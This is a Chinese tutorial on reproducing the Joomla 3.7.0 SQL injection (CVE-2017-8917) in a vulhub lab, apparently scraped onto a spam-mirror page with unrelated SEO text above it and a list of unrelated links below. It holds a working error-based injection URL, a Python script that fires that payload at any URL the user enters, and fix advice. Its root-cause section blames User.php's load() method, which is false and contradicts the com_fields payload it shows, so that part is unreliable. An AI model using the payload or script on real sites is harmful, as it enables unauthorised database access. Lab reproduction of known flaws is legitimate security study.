当前位置: 首页 > news >正文

网站做3年3年包括什么软件重庆网站建设找重庆万为

网站做3年3年包括什么软件,重庆网站建设找重庆万为,网站首页模版,做网站对服务器要求1 漏洞概述 Joomla是一个基于PHP的内容管理系统#xff08;CMS#xff09;#xff0c;广泛应用于各类网站。2017年#xff0c;Joomla 3.7.0版本被发现存在SQL注入漏洞#xff08;CVE-2017-8917#xff09;#xff0c;攻击者可以利用该漏洞对数据库进行未授权查询或操作…1 漏洞概述 Joomla是一个基于PHP的内容管理系统CMS广泛应用于各类网站。2017年Joomla 3.7.0版本被发现存在SQL注入漏洞CVE-2017-8917攻击者可以利用该漏洞对数据库进行未授权查询或操作可能导致数据泄露、篡改甚至删除。 2 影响范围 Joomla 3.7.0版本 3 漏洞原理 该漏洞主要源于Joomla 3.7.0版本中对用户输入处理不当导致攻击者可以在特定条件下向SQL查询中注入恶意代码。具体来说漏洞存在于libraries/src/User/User.php文件中的load()方法当用户登录时会调用此方法来加载用户信息。然而该方法未能充分过滤用户输入从而导致了SQL注入的发生。 4 vulhub靶场搭建 进入漏洞文件 cd vulhub/joomla/CVE-2017-8917 部署漏洞环境 docker compose up -d 查看漏洞端口 docker compose PS 启动后访问http://192.168.135.132:8080即可看到Joomla的安装界面和测试数据。 5 漏洞复现 直接访问http://192.168.135.132:8080/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml(0x23,concat(1,user()),1)即可看到SQL报错信息 6编写python脚本探测漏洞 #!/usr/bin/env python ​ import requests from urllib.parse import urljoin ​ def joomla3_sql(url):payload urljoin(url, /index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml(0x23,concat(1,user()),1)) ​response requests.get(urlpayload, verifyFalse) ​if XPATH syntax error in response.text:print(漏洞存在)else:print(漏洞不存在) ​ if __name__ __main__:print(注意本代码仅用于实验和学习目的请谨慎使用。)url input(请输入目标 URL: )joomla3_sql(url) 结果 7 修复建议 为了防范此漏洞建议采取以下措施 升级到最新的Joomla版本及时修补官方已知的漏洞 限制用户输入对所有用户提交的数据进行严格的过滤和验证 使用安全的编程实践遵循最佳安全指南以防止类似漏洞的出现 定期对网站进行安全审计检查是否存在其他潜在的安全风险。
http://www.dnsts.com.cn/news/151905.html

相关文章:

  • 重庆建设医院网站加载wordpress外部文件路径
  • 浦江县做网站网站查询信息
  • 同一源代码再建设一个网站app网站开发定制
  • 织梦网站备份几种方法希爱力的作用与功效
  • 深圳网站哪家强chinaz站长素材
  • 山东省建设监理协会网站6免费html转wordpress
  • 优秀 网站设计 蓝色一级造价工程师报名时间2024年
  • 系统网站哪个好会展相关网站建设
  • 建设文明网站平台的意义与概述目前国内做情趣最好的网站
  • 超轻粘土做动漫网站阿里云镜像wordpress
  • 网站模版aspwordpress 内核月报
  • 用了mip的网站网络推广
  • 做ftp网站怎么设置聚企360做的网站
  • 网站开发前端陕西手机网站建站
  • 营口网站建设单位咸宁网站建设哪家专业
  • 新公司注册网站30条新闻摘抄
  • 帝国cms网站迁移北京房产交易网官网
  • 外贸网站找人建设网站建设后的优势
  • 钛钢饰品网站建设wordpress登入
  • 为什么网站要用外链广告制作公司开票范围
  • 网站文件夹命名规则怎么做网站访问被拒绝
  • 注册网站域名多少钱一年app开发 网站建设
  • 游戏网站服务器租用源代码查看wordpress文件夹
  • 网络专业的网站建设触屏版手机网站开发
  • 域名连接到网站吗软件开发需求分析模板
  • 网站建设中如何设置外链接wordpress分类页面模板
  • 网站注册域名 免费wordpress三栏模板
  • 域名权重自己的网站怎么样推广优化
  • 深圳市建设行业门户网站网站建设公司
  • 营销型网站的缺点重点专业建设验收网站